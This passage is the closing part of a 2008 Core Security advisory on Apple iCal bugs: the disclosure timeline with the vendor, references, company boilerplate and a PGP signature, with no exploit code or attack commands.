estimated date and provides more details that explain why the first two bugs are been considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer which later triggers a null pointer de-reference that causes the application to crash. the root cause of the crash is a NULL pointer de-reference and not an integer overflow. 2008-04-17: Core confirms that the two first bugs can be considered crashes due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes. 2008-04-17: Vendor asks confirmation that the first two bugs have no security related consequences. 2008-04-17: Core responds that the three bugs still have security related consequences. The first two bugs can be abuse to execute denial of service attacks by untrusted and unauthenticated third parties specifically using public server as attack vector. Core considers bug that allow unauthenticated third parties to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem. 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software fixes release. 2008-05-05: Core informs the vendor that it's re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being released sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule publication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory. 2008-05-12: Core communicates the vendor that the publication of the advisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21: An edited and corrected final version of the advisory is sent to the vendor. 2008-05-21: Advisory CORE-2008-0126 is published. *References* [1] RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445 [2] RFC 4791: Calendaring Extensions to WebDAV - http://tools.ietf.org/html/rfc4791 [3] http://www.apple.com/downloads/macosx/calendars/ [4] iCalShare http://icalshare.com/ [5] iCalWorld http://www.icalworld.com/ *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -----END PGP SIGNATURE-----